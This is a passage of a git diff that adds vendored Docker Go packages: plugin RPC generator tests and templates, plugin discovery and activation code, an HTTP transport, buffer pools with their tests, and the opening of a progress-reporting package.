+const testFixture = "fixtures/foo.go"
+
+func TestParseEmptyInterface(t *testing.T) {
+	pkg, err := Parse(testFixture, "Fooer")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertName(t, "foo", pkg.Name)
+	assertNum(t, 0, len(pkg.Functions))
+}
+
+func TestParseNonInterfaceType(t *testing.T) {
+	_, err := Parse(testFixture, "wobble")
+	if _, ok := err.(errUnexpectedType); !ok {
+		t.Fatal("expected type error when parsing non-interface type")
+	}
+}
+
+func TestParseWithOneFunction(t *testing.T) {
+	pkg, err := Parse(testFixture, "Fooer2")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertName(t, "foo", pkg.Name)
+	assertNum(t, 1, len(pkg.Functions))
+	assertName(t, "Foo", pkg.Functions[0].Name)
+	assertNum(t, 0, len(pkg.Functions[0].Args))
+	assertNum(t, 0, len(pkg.Functions[0].Returns))
+}
+
+func TestParseWithMultipleFuncs(t *testing.T) {
+	pkg, err := Parse(testFixture, "Fooer3")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertName(t, "foo", pkg.Name)
+	assertNum(t, 7, len(pkg.Functions))
+
+	f := pkg.Functions[0]
+	assertName(t, "Foo", f.Name)
+	assertNum(t, 0, len(f.Args))
+	assertNum(t, 0, len(f.Returns))
+
+	f = pkg.Functions[1]
+	assertName(t, "Bar", f.Name)
+	assertNum(t, 1, len(f.Args))
+	assertNum(t, 0, len(f.Returns))
+	arg := f.Args[0]
+	assertName(t, "a", arg.Name)
+	assertName(t, "string", arg.ArgType)
+
+	f = pkg.Functions[2]
+	assertName(t, "Baz", f.Name)
+	assertNum(t, 1, len(f.Args))
+	assertNum(t, 1, len(f.Returns))
+	arg = f.Args[0]
+	assertName(t, "a", arg.Name)
+	assertName(t, "string", arg.ArgType)
+	arg = f.Returns[0]
+	assertName(t, "err", arg.Name)
+	assertName(t, "error", arg.ArgType)
+
+	f = pkg.Functions[3]
+	assertName(t, "Qux", f.Name)
+	assertNum(t, 2, len(f.Args))
+	assertNum(t, 2, len(f.Returns))
+	arg = f.Args[0]
+	assertName(t, "a", f.Args[0].Name)
+	assertName(t, "string", f.Args[0].ArgType)
+	arg = f.Args[1]
+	assertName(t, "b", arg.Name)
+	assertName(t, "string", arg.ArgType)
+	arg = f.Returns[0]
+	assertName(t, "val", arg.Name)
+	assertName(t, "string", arg.ArgType)
+	arg = f.Returns[1]
+	assertName(t, "err", arg.Name)
+	assertName(t, "error", arg.ArgType)
+
+	f = pkg.Functions[4]
+	assertName(t, "Wobble", f.Name)
+	assertNum(t, 0, len(f.Args))
+	assertNum(t, 1, len(f.Returns))
+	arg = f.Returns[0]
+	assertName(t, "w", arg.Name)
+	assertName(t, "*wobble", arg.ArgType)
+
+	f = pkg.Functions[5]
+	assertName(t, "Wiggle", f.Name)
+	assertNum(t, 0, len(f.Args))
+	assertNum(t, 1, len(f.Returns))
+	arg = f.Returns[0]
+	assertName(t, "w", arg.Name)
+	assertName(t, "wobble", arg.ArgType)
+
+	f = pkg.Functions[6]
+	assertName(t, "WiggleWobble", f.Name)
+	assertNum(t, 6, len(f.Args))
+	assertNum(t, 6, len(f.Returns))
+	expectedArgs := [][]string{
+		{"a", "[]*wobble"},
+		{"b", "[]wobble"},
+		{"c", "map[string]*wobble"},
+		{"d", "map[*wobble]wobble"},
+		{"e", "map[string][]wobble"},
+		{"f", "[]*otherfixture.Spaceship"},
+	}
+	for i, arg := range f.Args {
+		assertName(t, expectedArgs[i][0], arg.Name)
+		assertName(t, expectedArgs[i][1], arg.ArgType)
+	}
+	expectedReturns := [][]string{
+		{"g", "map[*wobble]wobble"},
+		{"h", "[][]*wobble"},
+		{"i", "otherfixture.Spaceship"},
+		{"j", "*otherfixture.Spaceship"},
+		{"k", "map[*otherfixture.Spaceship]otherfixture.Spaceship"},
+		{"l", "[]otherfixture.Spaceship"},
+	}
+	for i, ret := range f.Returns {
+		assertName(t, expectedReturns[i][0], ret.Name)
+		assertName(t, expectedReturns[i][1], ret.ArgType)
+	}
+}
+
+func TestParseWithUnamedReturn(t *testing.T) {
+	_, err := Parse(testFixture, "Fooer4")
+	if !strings.HasSuffix(err.Error(), errBadReturn.Error()) {
+		t.Fatalf("expected ErrBadReturn, got %v", err)
+	}
+}
+
+func TestEmbeddedInterface(t *testing.T) {
+	pkg, err := Parse(testFixture, "Fooer5")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertName(t, "foo", pkg.Name)
+	assertNum(t, 2, len(pkg.Functions))
+
+	f := pkg.Functions[0]
+	assertName(t, "Foo", f.Name)
+	assertNum(t, 0, len(f.Args))
+	assertNum(t, 0, len(f.Returns))
+
+	f = pkg.Functions[1]
+	assertName(t, "Boo", f.Name)
+	assertNum(t, 2, len(f.Args))
+	assertNum(t, 2, len(f.Returns))
+
+	arg := f.Args[0]
+	assertName(t, "a", arg.Name)
+	assertName(t, "string", arg.ArgType)
+
+	arg = f.Args[1]
+	assertName(t, "b", arg.Name)
+	assertName(t, "string", arg.ArgType)
+
+	arg = f.Returns[0]
+	assertName(t, "s", arg.Name)
+	assertName(t, "string", arg.ArgType)
+
+	arg = f.Returns[1]
+	assertName(t, "err", arg.Name)
+	assertName(t, "error", arg.ArgType)
+}
+
+func TestParsedImports(t *testing.T) {
+	cases := []string{"Fooer6", "Fooer7", "Fooer8", "Fooer9", "Fooer10", "Fooer11"}
+	for _, testCase := range cases {
+		pkg, err := Parse(testFixture, testCase)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		assertNum(t, 1, len(pkg.Imports))
+		importPath := strings.Split(pkg.Imports[0].Path, "/")
+		assertName(t, "otherfixture\"", importPath[len(importPath)-1])
+		assertName(t, "", pkg.Imports[0].Name)
+	}
+}
+
+func TestAliasedImports(t *testing.T) {
+	pkg, err := Parse(testFixture, "Fooer12")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertNum(t, 1, len(pkg.Imports))
+	assertName(t, "aliasedio", pkg.Imports[0].Name)
+}
+
+func assertName(t *testing.T, expected, actual string) {
+	if expected != actual {
+		fatalOut(t, fmt.Sprintf("expected name to be `%s`, got: %s", expected, actual))
+	}
+}
+
+func assertNum(t *testing.T, expected, actual int) {
+	if expected != actual {
+		fatalOut(t, fmt.Sprintf("expected number to be %d, got: %d", expected, actual))
+	}
+}
+
+func fatalOut(t *testing.T, msg string) {
+	_, file, ln, _ := runtime.Caller(2)
+	t.Fatalf("%s:%d: %s", filepath.Base(file), ln, msg)
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go
new file mode 100644
index 0000000000..50ed9293c1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go
@@ -0,0 +1,118 @@
+package main
+
+import (
+	"strings"
+	"text/template"
+)
+
+func printArgs(args []arg) string {
+	var argStr []string
+	for _, arg := range args {
+		argStr = append(argStr, arg.String())
+	}
+	return strings.Join(argStr, ", ")
+}
+
+func buildImports(specs []importSpec) string {
+	if len(specs) == 0 {
+		return `import "errors"`
+	}
+	imports := "import(\n"
+	imports += "\t\"errors\"\n"
+	for _, i := range specs {
+		imports += "\t" + i.String() + "\n"
+	}
+	imports += ")"
+	return imports
+}
+
+func marshalType(t string) string {
+	switch t {
+	case "error":
+		// convert error types to plain strings to ensure the values are encoded/decoded properly
+		return "string"
+	default:
+		return t
+	}
+}
+
+func isErr(t string) bool {
+	switch t {
+	case "error":
+		return true
+	default:
+		return false
+	}
+}
+
+// Need to use this helper due to issues with go-vet
+func buildTag(s string) string {
+	return "+build " + s
+}
+
+var templFuncs = template.FuncMap{
+	"printArgs":   printArgs,
+	"marshalType": marshalType,
+	"isErr":       isErr,
+	"lower":       strings.ToLower,
+	"title":       title,
+	"tag":         buildTag,
+	"imports":     buildImports,
+}
+
+func title(s string) string {
+	if strings.ToLower(s) == "id" {
+		return "ID"
+	}
+	return strings.Title(s)
+}
+
+var generatedTempl = template.Must(template.New("rpc_cient").Funcs(templFuncs).Parse(`
+// generated code - DO NOT EDIT
+{{ range $k, $v := .BuildTags }}
+	// {{ tag $k }} {{ end }}
+
+package {{ .Name }}
+
+{{ imports .Imports }}
+
+type client interface{
+	Call(string, interface{}, interface{}) error
+}
+
+type {{ .InterfaceType }}Proxy struct {
+	client
+}
+
+{{ range .Functions }}
+	type {{ $.InterfaceType }}Proxy{{ .Name }}Request struct{
+		{{ range .Args }}
+			{{ title .Name }} {{ .ArgType }} {{ end }}
+	}
+
+	type {{ $.InterfaceType }}Proxy{{ .Name }}Response struct{
+		{{ range .Returns }}
+			{{ title .Name }} {{ marshalType .ArgType }} {{ end }}
+	}
+
+	func (pp *{{ $.InterfaceType }}Proxy) {{ .Name }}({{ printArgs .Args }}) ({{ printArgs .Returns }}) {
+		var(
+			req {{ $.InterfaceType }}Proxy{{ .Name }}Request
+			ret {{ $.InterfaceType }}Proxy{{ .Name }}Response
+		)
+		{{ range .Args }}
+			req.{{ title .Name }} = {{ lower .Name }} {{ end }}
+		if err = pp.Call("{{ $.RPCName }}.{{ .Name }}", req, &ret); err != nil {
+			return
+		}
+		{{ range $r := .Returns }}
+			{{ if isErr .ArgType }}
+				if ret.{{ title .Name }} != "" {
+					{{ lower .Name }} = errors.New(ret.{{ title .Name }})
+				} {{ end }}
+			{{ if isErr .ArgType | not }} {{ lower .Name }} = ret.{{ title .Name }} {{ end }} {{ end }}
+
+		return
+	}
+{{ end }}
+`))
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins.go b/vendor/github.com/docker/docker/pkg/plugins/plugins.go
new file mode 100644
index 0000000000..c0059cba75
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugins.go
@@ -0,0 +1,329 @@
+// Package plugins provides structures and helper functions to manage Docker
+// plugins.
+//
+// Docker discovers plugins by looking for them in the plugin directory whenever
+// a user or container tries to use one by name. UNIX domain socket files must
+// be located under /run/docker/plugins, whereas spec files can be located
+// either under /etc/docker/plugins or /usr/lib/docker/plugins. This is handled
+// by the Registry interface, which lets you list all plugins or get a plugin by
+// its name if it exists.
+//
+// The plugins need to implement an HTTP server and bind this to the UNIX socket
+// or the address specified in the spec files.
+// A handshake is send at /Plugin.Activate, and plugins are expected to return
+// a Manifest with a list of of Docker subsystems which this plugin implements.
+//
+// In order to use a plugins, you can use the ``Get`` with the name of the
+// plugin and the subsystem it implements.
+//
+//	plugin, err := plugins.Get("example", "VolumeDriver")
+//	if err != nil {
+//		return fmt.Errorf("Error looking up volume plugin example: %v", err)
+//	}
+package plugins
+
+import (
+	"errors"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/go-connections/tlsconfig"
+)
+
+var (
+	// ErrNotImplements is returned if the plugin does not implement the requested driver.
+	ErrNotImplements = errors.New("Plugin does not implement the requested driver")
+)
+
+type plugins struct {
+	sync.Mutex
+	plugins map[string]*Plugin
+}
+
+type extpointHandlers struct {
+	sync.RWMutex
+	extpointHandlers map[string][]func(string, *Client)
+}
+
+var (
+	storage  = plugins{plugins: make(map[string]*Plugin)}
+	handlers = extpointHandlers{extpointHandlers: make(map[string][]func(string, *Client))}
+)
+
+// Manifest lists what a plugin implements.
+type Manifest struct {
+	// List of subsystem the plugin implements.
+	Implements []string
+}
+
+// Plugin is the definition of a docker plugin.
+type Plugin struct {
+	// Name of the plugin
+	name string
+	// Address of the plugin
+	Addr string
+	// TLS configuration of the plugin
+	TLSConfig *tlsconfig.Options
+	// Client attached to the plugin
+	client *Client
+	// Manifest of the plugin (see above)
+	Manifest *Manifest `json:"-"`
+
+	// wait for activation to finish
+	activateWait *sync.Cond
+	// error produced by activation
+	activateErr error
+	// keeps track of callback handlers run against this plugin
+	handlersRun bool
+}
+
+// Name returns the name of the plugin.
+func (p *Plugin) Name() string {
+	return p.name
+}
+
+// Client returns a ready-to-use plugin client that can be used to communicate with the plugin.
+func (p *Plugin) Client() *Client {
+	return p.client
+}
+
+// IsV1 returns true for V1 plugins and false otherwise.
+func (p *Plugin) IsV1() bool {
+	return true
+}
+
+// NewLocalPlugin creates a new local plugin.
+func NewLocalPlugin(name, addr string) *Plugin {
+	return &Plugin{
+		name: name,
+		Addr: addr,
+		// TODO: change to nil
+		TLSConfig:    &tlsconfig.Options{InsecureSkipVerify: true},
+		activateWait: sync.NewCond(&sync.Mutex{}),
+	}
+}
+
+func (p *Plugin) activate() error {
+	p.activateWait.L.Lock()
+
+	if p.activated() {
+		p.runHandlers()
+		p.activateWait.L.Unlock()
+		return p.activateErr
+	}
+
+	p.activateErr = p.activateWithLock()
+
+	p.runHandlers()
+	p.activateWait.L.Unlock()
+	p.activateWait.Broadcast()
+	return p.activateErr
+}
+
+// runHandlers runs the registered handlers for the implemented plugin types
+// This should only be run after activation, and while the activation lock is held.
+func (p *Plugin) runHandlers() {
+	if !p.activated() {
+		return
+	}
+
+	handlers.RLock()
+	if !p.handlersRun {
+		for _, iface := range p.Manifest.Implements {
+			hdlrs, handled := handlers.extpointHandlers[iface]
+			if !handled {
+				continue
+			}
+			for _, handler := range hdlrs {
+				handler(p.name, p.client)
+			}
+		}
+		p.handlersRun = true
+	}
+	handlers.RUnlock()
+
+}
+
+// activated returns if the plugin has already been activated.
+// This should only be called with the activation lock held
+func (p *Plugin) activated() bool {
+	return p.Manifest != nil
+}
+
+func (p *Plugin) activateWithLock() error {
+	c, err := NewClient(p.Addr, p.TLSConfig)
+	if err != nil {
+		return err
+	}
+	p.client = c
+
+	m := new(Manifest)
+	if err = p.client.Call("Plugin.Activate", nil, m); err != nil {
+		return err
+	}
+
+	p.Manifest = m
+	return nil
+}
+
+func (p *Plugin) waitActive() error {
+	p.activateWait.L.Lock()
+	for !p.activated() && p.activateErr == nil {
+		p.activateWait.Wait()
+	}
+	p.activateWait.L.Unlock()
+	return p.activateErr
+}
+
+func (p *Plugin) implements(kind string) bool {
+	if p.Manifest == nil {
+		return false
+	}
+	for _, driver := range p.Manifest.Implements {
+		if driver == kind {
+			return true
+		}
+	}
+	return false
+}
+
+func load(name string) (*Plugin, error) {
+	return loadWithRetry(name, true)
+}
+
+func loadWithRetry(name string, retry bool) (*Plugin, error) {
+	registry := newLocalRegistry()
+	start := time.Now()
+
+	var retries int
+	for {
+		pl, err := registry.Plugin(name)
+		if err != nil {
+			if !retry {
+				return nil, err
+			}
+
+			timeOff := backoff(retries)
+			if abort(start, timeOff) {
+				return nil, err
+			}
+			retries++
+			logrus.Warnf("Unable to locate plugin: %s, retrying in %v", name, timeOff)
+			time.Sleep(timeOff)
+			continue
+		}
+
+		storage.Lock()
+		if pl, exists := storage.plugins[name]; exists {
+			storage.Unlock()
+			return pl, pl.activate()
+		}
+		storage.plugins[name] = pl
+		storage.Unlock()
+
+		err = pl.activate()
+
+		if err != nil {
+			storage.Lock()
+			delete(storage.plugins, name)
+			storage.Unlock()
+		}
+
+		return pl, err
+	}
+}
+
+func get(name string) (*Plugin, error) {
+	storage.Lock()
+	pl, ok := storage.plugins[name]
+	storage.Unlock()
+	if ok {
+		return pl, pl.activate()
+	}
+	return load(name)
+}
+
+// Get returns the plugin given the specified name and requested implementation.
+func Get(name, imp string) (*Plugin, error) {
+	pl, err := get(name)
+	if err != nil {
+		return nil, err
+	}
+	if err := pl.waitActive(); err == nil && pl.implements(imp) {
+		logrus.Debugf("%s implements: %s", name, imp)
+		return pl, nil
+	}
+	return nil, ErrNotImplements
+}
+
+// Handle adds the specified function to the extpointHandlers.
+func Handle(iface string, fn func(string, *Client)) {
+	handlers.Lock()
+	hdlrs, ok := handlers.extpointHandlers[iface]
+	if !ok {
+		hdlrs = []func(string, *Client){}
+	}
+
+	hdlrs = append(hdlrs, fn)
+	handlers.extpointHandlers[iface] = hdlrs
+
+	storage.Lock()
+	for _, p := range storage.plugins {
+		p.activateWait.L.Lock()
+		if p.activated() && p.implements(iface) {
+			p.handlersRun = false
+		}
+		p.activateWait.L.Unlock()
+	}
+	storage.Unlock()
+
+	handlers.Unlock()
+}
+
+// GetAll returns all the plugins for the specified implementation
+func GetAll(imp string) ([]*Plugin, error) {
+	pluginNames, err := Scan()
+	if err != nil {
+		return nil, err
+	}
+
+	type plLoad struct {
+		pl  *Plugin
+		err error
+	}
+
+	chPl := make(chan *plLoad, len(pluginNames))
+	var wg sync.WaitGroup
+	for _, name := range pluginNames {
+		storage.Lock()
+		pl, ok := storage.plugins[name]
+		storage.Unlock()
+		if ok {
+			chPl <- &plLoad{pl, nil}
+			continue
+		}
+
+		wg.Add(1)
+		go func(name string) {
+			defer wg.Done()
+			pl, err := loadWithRetry(name, false)
+			chPl <- &plLoad{pl, err}
+		}(name)
+	}
+
+	wg.Wait()
+	close(chPl)
+
+	var out []*Plugin
+	for pl := range chPl {
+		if pl.err != nil {
+			logrus.Error(pl.err)
+			continue
+		}
+		if err := pl.pl.waitActive(); err == nil && pl.pl.implements(imp) {
+			out = append(out, pl.pl)
+		}
+	}
+	return out, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go
new file mode 100644
index 0000000000..9c5a0b5632
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go
@@ -0,0 +1,7 @@
+package plugins
+
+// BasePath returns the path to which all paths returned by the plugin are relative to.
+// For v1 plugins, this always returns the host's root directory.
+func (p *Plugin) BasePath() string {
+	return "/"
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go
new file mode 100644
index 0000000000..3c8d8feb83
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go
@@ -0,0 +1,8 @@
+package plugins
+
+// BasePath returns the path to which all paths returned by the plugin are relative to.
+// For Windows v1 plugins, this returns an empty string, since the plugin is already aware
+// of the absolute path of the mount.
+func (p *Plugin) BasePath() string {
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go
new file mode 100644
index 0000000000..5be146af65
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go
@@ -0,0 +1,36 @@
+package transport
+
+import (
+	"io"
+	"net/http"
+)
+
+// httpTransport holds an http.RoundTripper
+// and information about the scheme and address the transport
+// sends request to.
+type httpTransport struct {
+	http.RoundTripper
+	scheme string
+	addr   string
+}
+
+// NewHTTPTransport creates a new httpTransport.
+func NewHTTPTransport(r http.RoundTripper, scheme, addr string) Transport {
+	return httpTransport{
+		RoundTripper: r,
+		scheme:       scheme,
+		addr:         addr,
+	}
+}
+
+// NewRequest creates a new http.Request and sets the URL
+// scheme and address with the transport's fields.
+func (t httpTransport) NewRequest(path string, data io.Reader) (*http.Request, error) {
+	req, err := newHTTPRequest(path, data)
+	if err != nil {
+		return nil, err
+	}
+	req.URL.Scheme = t.scheme
+	req.URL.Host = t.addr
+	return req, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go
new file mode 100644
index 0000000000..d7f1e2100c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go
@@ -0,0 +1,36 @@
+package transport
+
+import (
+	"io"
+	"net/http"
+	"strings"
+)
+
+// VersionMimetype is the Content-Type the engine sends to plugins.
+const VersionMimetype = "application/vnd.docker.plugins.v1.2+json"
+
+// RequestFactory defines an interface that
+// transports can implement to create new requests.
+type RequestFactory interface {
+	NewRequest(path string, data io.Reader) (*http.Request, error)
+}
+
+// Transport defines an interface that plugin transports
+// must implement.
+type Transport interface {
+	http.RoundTripper
+	RequestFactory
+}
+
+// newHTTPRequest creates a new request with a path and a body.
+func newHTTPRequest(path string, data io.Reader) (*http.Request, error) {
+	if !strings.HasPrefix(path, "/") {
+		path = "/" + path
+	}
+	req, err := http.NewRequest("POST", path, data)
+	if err != nil {
+		return nil, err
+	}
+	req.Header.Add("Accept", VersionMimetype)
+	return req, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/pools/pools.go b/vendor/github.com/docker/docker/pkg/pools/pools.go
new file mode 100644
index 0000000000..5c5aead698
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pools/pools.go
@@ -0,0 +1,116 @@
+// Package pools provides a collection of pools which provide various
+// data types with buffers. These can be used to lower the number of
+// memory allocations and reuse buffers.
+//
+// New pools should be added to this package to allow them to be
+// shared across packages.
+//
+// Utility functions which operate on pools should be added to this
+// package to allow them to be reused.
+package pools
+
+import (
+	"bufio"
+	"io"
+	"sync"
+
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+var (
+	// BufioReader32KPool is a pool which returns bufio.Reader with a 32K buffer.
+	BufioReader32KPool = newBufioReaderPoolWithSize(buffer32K)
+	// BufioWriter32KPool is a pool which returns bufio.Writer with a 32K buffer.
+	BufioWriter32KPool = newBufioWriterPoolWithSize(buffer32K)
+)
+
+const buffer32K = 32 * 1024
+
+// BufioReaderPool is a bufio reader that uses sync.Pool.
+type BufioReaderPool struct {
+	pool sync.Pool
+}
+
+// newBufioReaderPoolWithSize is unexported because new pools should be
+// added here to be shared where required.
+func newBufioReaderPoolWithSize(size int) *BufioReaderPool {
+	return &BufioReaderPool{
+		pool: sync.Pool{
+			New: func() interface{} { return bufio.NewReaderSize(nil, size) },
+		},
+	}
+}
+
+// Get returns a bufio.Reader which reads from r. The buffer size is that of the pool.
+func (bufPool *BufioReaderPool) Get(r io.Reader) *bufio.Reader {
+	buf := bufPool.pool.Get().(*bufio.Reader)
+	buf.Reset(r)
+	return buf
+}
+
+// Put puts the bufio.Reader back into the pool.
+func (bufPool *BufioReaderPool) Put(b *bufio.Reader) {
+	b.Reset(nil)
+	bufPool.pool.Put(b)
+}
+
+// Copy is a convenience wrapper which uses a buffer to avoid allocation in io.Copy.
+func Copy(dst io.Writer, src io.Reader) (written int64, err error) {
+	buf := BufioReader32KPool.Get(src)
+	written, err = io.Copy(dst, buf)
+	BufioReader32KPool.Put(buf)
+	return
+}
+
+// NewReadCloserWrapper returns a wrapper which puts the bufio.Reader back
+// into the pool and closes the reader if it's an io.ReadCloser.
+func (bufPool *BufioReaderPool) NewReadCloserWrapper(buf *bufio.Reader, r io.Reader) io.ReadCloser {
+	return ioutils.NewReadCloserWrapper(r, func() error {
+		if readCloser, ok := r.(io.ReadCloser); ok {
+			readCloser.Close()
+		}
+		bufPool.Put(buf)
+		return nil
+	})
+}
+
+// BufioWriterPool is a bufio writer that uses sync.Pool.
+type BufioWriterPool struct {
+	pool sync.Pool
+}
+
+// newBufioWriterPoolWithSize is unexported because new pools should be
+// added here to be shared where required.
+func newBufioWriterPoolWithSize(size int) *BufioWriterPool {
+	return &BufioWriterPool{
+		pool: sync.Pool{
+			New: func() interface{} { return bufio.NewWriterSize(nil, size) },
+		},
+	}
+}
+
+// Get returns a bufio.Writer which writes to w. The buffer size is that of the pool.
+func (bufPool *BufioWriterPool) Get(w io.Writer) *bufio.Writer {
+	buf := bufPool.pool.Get().(*bufio.Writer)
+	buf.Reset(w)
+	return buf
+}
+
+// Put puts the bufio.Writer back into the pool.
+func (bufPool *BufioWriterPool) Put(b *bufio.Writer) {
+	b.Reset(nil)
+	bufPool.pool.Put(b)
+}
+
+// NewWriteCloserWrapper returns a wrapper which puts the bufio.Writer back
+// into the pool and closes the writer if it's an io.Writecloser.
+func (bufPool *BufioWriterPool) NewWriteCloserWrapper(buf *bufio.Writer, w io.Writer) io.WriteCloser {
+	return ioutils.NewWriteCloserWrapper(w, func() error {
+		buf.Flush()
+		if writeCloser, ok := w.(io.WriteCloser); ok {
+			writeCloser.Close()
+		}
+		bufPool.Put(buf)
+		return nil
+	})
+}
diff --git a/vendor/github.com/docker/docker/pkg/pools/pools_test.go b/vendor/github.com/docker/docker/pkg/pools/pools_test.go
new file mode 100644
index 0000000000..1661b780c9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pools/pools_test.go
@@ -0,0 +1,161 @@
+package pools
+
+import (
+	"bufio"
+	"bytes"
+	"io"
+	"strings"
+	"testing"
+)
+
+func TestBufioReaderPoolGetWithNoReaderShouldCreateOne(t *testing.T) {
+	reader := BufioReader32KPool.Get(nil)
+	if reader == nil {
+		t.Fatalf("BufioReaderPool should have create a bufio.Reader but did not.")
+	}
+}
+
+func TestBufioReaderPoolPutAndGet(t *testing.T) {
+	sr := bufio.NewReader(strings.NewReader("foobar"))
+	reader := BufioReader32KPool.Get(sr)
+	if reader == nil {
+		t.Fatalf("BufioReaderPool should not return a nil reader.")
+	}
+	// verify the first 3 byte
+	buf1 := make([]byte, 3)
+	_, err := reader.Read(buf1)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if actual := string(buf1); actual != "foo" {
+		t.Fatalf("The first letter should have been 'foo' but was %v", actual)
+	}
+	BufioReader32KPool.Put(reader)
+	// Try to read the next 3 bytes
+	_, err = sr.Read(make([]byte, 3))
+	if err == nil || err != io.EOF {
+		t.Fatalf("The buffer should have been empty, issue an EOF error.")
+	}
+}
+
+type simpleReaderCloser struct {
+	io.Reader
+	closed bool
+}
+
+func (r *simpleReaderCloser) Close() error {
+	r.closed = true
+	return nil
+}
+
+func TestNewReadCloserWrapperWithAReadCloser(t *testing.T) {
+	br := bufio.NewReader(strings.NewReader(""))
+	sr := &simpleReaderCloser{
+		Reader: strings.NewReader("foobar"),
+		closed: false,
+	}
+	reader := BufioReader32KPool.NewReadCloserWrapper(br, sr)
+	if reader == nil {
+		t.Fatalf("NewReadCloserWrapper should not return a nil reader.")
+	}
+	// Verify the content of reader
+	buf := make([]byte, 3)
+	_, err := reader.Read(buf)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if actual := string(buf); actual != "foo" {
+		t.Fatalf("The first 3 letter should have been 'foo' but were %v", actual)
+	}
+	reader.Close()
+	// Read 3 more bytes "bar"
+	_, err = reader.Read(buf)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if actual := string(buf); actual != "bar" {
+		t.Fatalf("The first 3 letter should have been 'bar' but were %v", actual)
+	}
+	if !sr.closed {
+		t.Fatalf("The ReaderCloser should have been closed, it is not.")
+	}
+}
+
+func TestBufioWriterPoolGetWithNoReaderShouldCreateOne(t *testing.T) {
+	writer := BufioWriter32KPool.Get(nil)
+	if writer == nil {
+		t.Fatalf("BufioWriterPool should have create a bufio.Writer but did not.")
+	}
+}
+
+func TestBufioWriterPoolPutAndGet(t *testing.T) {
+	buf := new(bytes.Buffer)
+	bw := bufio.NewWriter(buf)
+	writer := BufioWriter32KPool.Get(bw)
+	if writer == nil {
+		t.Fatalf("BufioReaderPool should not return a nil writer.")
+	}
+	written, err := writer.Write([]byte("foobar"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if written != 6 {
+		t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written)
+	}
+	// Make sure we Flush all the way ?
+	writer.Flush()
+	bw.Flush()
+	if len(buf.Bytes()) != 6 {
+		t.Fatalf("The buffer should contain 6 bytes ('foobar') but contains %v ('%v')", buf.Bytes(), string(buf.Bytes()))
+	}
+	// Reset the buffer
+	buf.Reset()
+	BufioWriter32KPool.Put(writer)
+	// Try to write something
+	if _, err = writer.Write([]byte("barfoo")); err != nil {
+		t.Fatal(err)
+	}
+	// If we now try to flush it, it should panic (the writer is nil)
+	// recover it
+	defer func() {
+		if r := recover(); r == nil {
+			t.Fatal("Trying to flush the writter should have 'paniced', did not.")
+		}
+	}()
+	writer.Flush()
+}
+
+type simpleWriterCloser struct {
+	io.Writer
+	closed bool
+}
+
+func (r *simpleWriterCloser) Close() error {
+	r.closed = true
+	return nil
+}
+
+func TestNewWriteCloserWrapperWithAWriteCloser(t *testing.T) {
+	buf := new(bytes.Buffer)
+	bw := bufio.NewWriter(buf)
+	sw := &simpleWriterCloser{
+		Writer: new(bytes.Buffer),
+		closed: false,
+	}
+	bw.Flush()
+	writer := BufioWriter32KPool.NewWriteCloserWrapper(bw, sw)
+	if writer == nil {
+		t.Fatalf("BufioReaderPool should not return a nil writer.")
+	}
+	written, err := writer.Write([]byte("foobar"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if written != 6 {
+		t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written)
+	}
+	writer.Close()
+	if !sw.closed {
+		t.Fatalf("The ReaderCloser should have been closed, it is not.")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/progress/progress.go b/vendor/github.com/docker/docker/pkg/progress/progress.go
new file mode 100644
index 0000000000..fcf31173cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/progress/progress.go
@@ -0,0 +1,84 @@
+package progress
+
+import (
+	"fmt"
+)
+
+// Progress represents the progress of a transfer.
+type Progress struct {
+	ID string
+
+	// Progress contains a Message or...
+	Message string
+
+	// ...progress of an action
+	Action  string
+	Current int64
+	Total   int64
+
+	// Aux contains extra information not presented to the user, such as
+	// digests for push signing.
+	Aux interface{}
+
+	LastUpdate bool
+}
+
+// Output is an interface for writing progress information. It's
+// like a writer for progress, but we don't call it Writer because
+// that would be confusing next to ProgressReader (also, because it
+// doesn't implement the io.Writer interface).
+type Output interface {
+	WriteProgress(Progress) error
+}
+
+type chanOutput chan<- Progress
+
+func (out chanOutput) WriteProgress(p Progress) error {
+	out <- p
+	return nil
+}
+
+// ChanOutput returns an Output that writes progress updates to the
+// supplied channel.
+func ChanOutput(progressChan chan<- Progress) Output {
+	return chanOutput(progressChan)
+}
+
+type discardOutput struct{}
+
+func (discardOutput) WriteProgress(Progress) error {
+	return nil
+}
+
+// DiscardOutput returns an Output that discards progress
